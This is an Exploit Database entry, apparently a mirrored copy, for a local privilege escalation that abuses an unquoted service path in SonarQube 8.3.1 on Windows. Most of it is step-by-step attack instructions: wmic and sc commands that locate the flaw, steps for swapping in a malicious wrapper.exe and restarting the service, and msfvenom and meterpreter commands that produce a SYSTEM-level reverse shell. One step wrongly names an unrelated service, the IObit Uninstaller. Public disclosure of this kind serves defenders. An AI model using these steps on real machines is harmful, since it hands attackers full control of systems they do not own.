Sonar Qube 8.3.1 – ‘SonarQube Service’ Unquoted Service Path

• Exploit Database
• 111 阅读

• 作者： Velayutham Selvaraj
  日期： 2020-07-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48677/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  # Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path # Author: Velayutham Selvaraj # Date: 2020-06-03 # Vendor Homepage: https://www.sonarqube.org # Software Link: https://www.sonarqube.org/downloads/ # Version : 8.3.1 # Tested on: Windows 10 64bit(EN)   About Unquoted Service Path : ==============================   When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).   Steps to recreate : =============================   1.Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2.The Vulnerable Service would Show up. 3.Check the Service Permissions by typing [ sc qc SonarQube] 4.The command would return..   C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube [SC] QueryServiceConfig SUCCESS   SERVICE_NAME: SonarQube TYPE : 10WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL: 1 NORMAL BINARY_PATH_NAME : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : SonarQube DEPENDENCIES : SERVICE_START_NAME : LocalSystem   5.This concludes that the service is running as SYSTEM. "Highest privilege in a machine" 6.Now create a Payload with msfvenom or other tools and name it to wrapper.exe 7.Make sure you have write Permissions to where you downloaded. i kept it in downloads folders but confirmed it in program files as well. 8.Provided that you have right permissions, Drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" Directory. 9.Now restart the IObit Uninstaller service by giving coommand [ sc stop SonarQube] followed by [ sc start SonarQube] 10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].   During my testing :   Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]